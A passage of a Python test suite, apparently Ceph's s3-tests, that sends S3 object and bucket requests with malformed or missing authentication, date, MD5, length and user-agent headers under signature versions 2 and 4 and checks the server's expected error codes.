e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
#
# AWS2 specific tests
#
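# Each test below calls check_aws2_support() first, so this group is skipped
# when boto is configured for SigV4 signing (i.e. S3_USE_SIGV4 is set).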
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_garbage_aws2():
check_aws2_support()
key = _setup_bad_object({'Content-MD5':'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too short')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_mismatch_below_aws2():
check_aws2_support()
content = 'bar'
length = len(content) - 1
key = _setup_bad_object({'Content-Length': length})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'BadDigest')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/incorrect authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_incorrect_aws2():
check_aws2_support()
key = _setup_bad_object({'Authorization': 'AWS AKIAIGR7ZNNBHC5BKSUB:FWeDfwojDSdS2Ztmpfeubhd9isU='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch', 'InvalidAccessKeyId')
@tag('auth_aws2')
@nose.with_setup(teardown=_clear_custom_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
def test_object_create_bad_authorization_invalid_aws2():
check_aws2_support()
key = _setup_bad_object({'Authorization': 'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_empty_aws2():
check_aws2_support()
key = _setup_bad_object({'User-Agent': ''})
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='succeeds')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_unreadable_aws2():
check_aws2_support()
key = _setup_bad_object({'User-Agent': '\x07'})
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_none_aws2():
check_aws2_support()
key = _setup_bad_object(remove=('User-Agent',))
key.set_contents_from_string('bar')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_invalid_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_empty_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_unreadable_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_none_aws2():
check_aws2_support()
key = _setup_bad_object(remove=('Date',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_today_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_today_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_epoch_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_end_aws2():
check_aws2_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 9999 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_invalid_aws2():
check_aws2_support()
_add_custom_headers({'Authorization': 'AWS HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_empty_aws2():
check_aws2_support()
_add_custom_headers({'User-Agent': ''})
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='succeeds')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_unreadable_aws2():
check_aws2_support()
_add_custom_headers({'User-Agent': '\x07'})
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_none_aws2():
check_aws2_support()
_add_custom_headers(remove=('User-Agent',))
bucket = get_new_bucket()
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_invalid_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_empty_aws2():
check_aws2_support()
_add_custom_headers({'Date': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_unreadable_aws2():
check_aws2_support()
_add_custom_headers({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_none_aws2():
check_aws2_support()
_add_custom_headers(remove=('Date',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_today_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_after_today_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'RequestTimeTooSkewed')
@tag('auth_aws2')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_epoch_aws2():
check_aws2_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
#
# AWS4 specific tests
#
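# check_aws4_support()/check_aws2_support() gate tests on the signing scheme:
# boto switches to AWS signature version 4 when the S3_USE_SIGV4 environment
# variable is set, so SigV4-only tests skip without it and SigV2-only tests
# skip with it.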
def check_aws4_support():
if 'S3_USE_SIGV4' not in os.environ:
raise SkipTest
def check_aws2_support():
if 'S3_USE_SIGV4' in os.environ:
raise SkipTest
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_garbage_aws4():
check_aws4_support()
key = _setup_bad_object({'Content-MD5':'AWS4 HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too short')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_mismatch_below_aws4():
check_aws4_support()
content = 'bar'
length = len(content) - 1
key = _setup_bad_object({'Content-Length': length})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'XAmzContentSHA256Mismatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/incorrect authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_incorrect_aws4():
check_aws4_support()
key = _setup_bad_object({'Authorization': 'AWS4-HMAC-SHA256 Credential=AKIAIGR7ZNNBHC5BKSUB/20150930/us-east-1/s3/aws4_request,SignedHeaders=host;user-agent,Signature=FWeDfwojDSdS2Ztmpfeubhd9isU='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch', 'InvalidAccessKeyId')
@tag('auth_aws4')
@nose.with_setup(teardown=_clear_custom_headers)
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
def test_object_create_bad_authorization_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'Authorization': 'AWS4-HMAC-SHA256 Credential=HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
assert e.error_code in ('AuthorizationHeaderMalformed', 'InvalidArgument')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'User-Agent': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'User-Agent': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_ua_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('User-Agent',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Bad Date'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_invalid_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': ''})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_empty_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic x-amz-date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_unreadable_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('Date',))
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_none_aws4():
check_aws4_support()
key = _setup_bad_object(remove=('X-Amz-Date',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_today_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_before_today_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '20100707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_today_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_after_today_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '20300707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_before_epoch_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_before_epoch_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '19500707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_date_after_end_aws4():
check_aws4_support()
key = _setup_bad_object({'Date': 'Tue, 07 Jul 9999 21:53:04 GMT'})
key.set_contents_from_string('bar')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/x-amz-date after 9999')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_amz_date_after_end_aws4():
check_aws4_support()
key = _setup_bad_object({'X-Amz-Date': '99990707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
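# The next two tests build a SigV4 presigned URL and then issue a raw request
# whose headers/query string no longer match what was signed, expecting 403.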
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create with missing signed custom header')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_missing_signed_custom_header_aws4():
check_aws4_support()
method='PUT'
expires_in='100000'
bucket = get_new_bucket()
key = bucket.new_key('foo')
body='zoo'
# compute the signature with 'x-amz-foo=bar' in the headers...
request_headers = {'x-amz-foo':'bar'}
url = key.generate_url(expires_in, method=method, headers=request_headers)
o = urlparse(url)
path = o.path + '?' + o.query
# avoid sending 'x-amz-foo=bar' in the headers
request_headers.pop('x-amz-foo')
res =_make_raw_request(host=s3.main.host, port=s3.main.port, method=method, path=path,
body=body, request_headers=request_headers, secure=s3.main.is_secure)
eq(res.status, 403)
eq(res.reason, 'Forbidden')
@tag('auth_aws4')
@attr(resource='object')
@attr(method='put')
@attr(operation='create with missing signed header')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_missing_signed_header_aws4():
check_aws4_support()
method='PUT'
expires_in='100000'
bucket = get_new_bucket()
key = bucket.new_key('foo')
body='zoo'
# compute the signature...
request_headers = {}
url = key.generate_url(expires_in, method=method, headers=request_headers)
o = urlparse(url)
path = o.path + '?' + o.query
# strip 'X-Amz-Expires' from the signed query string so the request is missing it
target = r'&X-Amz-Expires=' + expires_in
path = re.sub(target, '', path)
res =_make_raw_request(host=s3.main.host, port=s3.main.port, method=method, path=path,
body=body, request_headers=request_headers, secure=s3.main.is_secure)
eq(res.status, 403)
eq(res.reason, 'Forbidden')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid authorization')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_invalid_aws4():
check_aws4_support()
_add_custom_headers({'Authorization': 'AWS4 HAHAHA'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidArgument')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_empty_aws4():
check_aws4_support()
_add_custom_headers({'User-Agent': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic user agent')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'User-Agent': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no user agent')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_ua_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('User-Agent',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_invalid_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Bad Date'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/invalid x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_invalid_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': 'Bad Date'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_empty_aws4():
check_aws4_support()
_add_custom_headers({'Date': ''})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_empty_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic x-amz-date')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_unreadable_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no date')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('Date',))
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no x-amz-date')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_none_aws4():
check_aws4_support()
_add_custom_headers(remove=('X-Amz-Date',))
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in past')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
